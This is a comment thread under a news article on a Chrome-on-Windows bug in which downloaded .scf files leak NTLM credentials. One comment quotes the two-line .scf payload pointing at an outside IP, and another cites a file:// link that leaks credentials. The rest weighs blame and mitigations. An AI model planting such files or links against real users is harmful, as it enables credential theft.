back to article Chrome on Windows has credential theft bug

Google's Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows. The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98). This exploits two …

  1. ZanzibarRastapopulous

    If the .scf file contains this code:

    > [Shell]

    > IconFile=\\170.170.170.170\icon

    Surely most corporate networks will block almost all external IP's though?

    1. John Mangan

      Re: If the .scf file contains this code:

      I think some people use computers at home or while out and about .. . .

      1. Anonymous Coward
        Anonymous Coward

        Re: If the .scf file contains this code:

        But not SMB over the internet shirley?

  2. Anonymous Coward
    Windows

    Not on Win7+ I believe...

    "To retrieve the icon, the user's machine will present credentials to a server – their user ID and hashed password on a corporate network, or the home group's credentials if it's a personal machine."

    I believe this to be a non-issue. On my home network I have quite a few machines which I use to connect to, and which shares are protected with a username/password combination. I also always click the "remember" checkbox to keep things easy on me.

    So here's the thing: every time I reset my computer then Windows 7 will ask me for my credentials all over again. It literally doesn't remember squat whenever you rebooted. Now in all fairness I must point out that I'm using Windows 7 with a non-administrative account. But wouldn't that also apply to those computers in an corporate / enterprise network?

    So yeah, I can't help wonder if this issue is really as big as is being claimed.

    1. Amos1

      Re: Not on Win7+ I believe...

      Yes, with all the attention given to SMB lately most companies will block that traffic outbound. But there are many, many smaller companies who have those systems handled by someone else, even their ISP. Or they bought something and once they had connectivity they left it alone. They are at risk as is the home user. No, the credentials will not have to be typed manually on business devices. That's all handled transparently. Given how fast Google automatically patches things this probably is a non-issue.

  3. Baldrickk Silver badge

    Isn't this an issue outside of Chrome?

    Chrome in this case appears to be doing _exactly_ what it is told to do. That being to download a file and store it in the file system.

    The actual issue, that a shortcut file can cause your machine to attempt to communicate with a third party just by opening the directory it is stored in would seem to me to be more of a Windows issue.

    Or am I wrong?

  4. Updraft102

    Wait... Windows cheerfully reveals its hashed login info to any IP in the two-line text file just by being in the directory a user viewed, and it's Chrome that has a bug because it faithfully downloads the file without screwing with the filename?

    I don't see that as a bug. If it renames the file without permission, though, I would see THAT as a bug.

    1. Robert Carnegie Silver badge

      Apparently, Chrome downloads an executable file without scanning it for threats. Anyway, they're going to fix it.

      1. Anonymous Coward
        Anonymous Coward

        "Anyway, they're going to fix it."

        ...because Microsoft certainly won't.

        1. Anonymous Coward
          Anonymous Coward

          Thats because Windows is working as designed

          that is not a bug, it's just terrible...

  5. Anonymous Coward
    Anonymous Coward

    IE does this by default (since 1997)

    "Tricking" IE into connecting to file://\\example.com/ leaks NTLM credentials.

    2016: https://www.perfect-privacy.com/blog/2016/08/01/security-issue-in-windows-leaks-login-data/

    1997: http://insecure.org/sploits/winnt.automatic.authentication.html

    MS claims that this is the correct behaviour and you should filter outgoing connections if you don't like it.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2020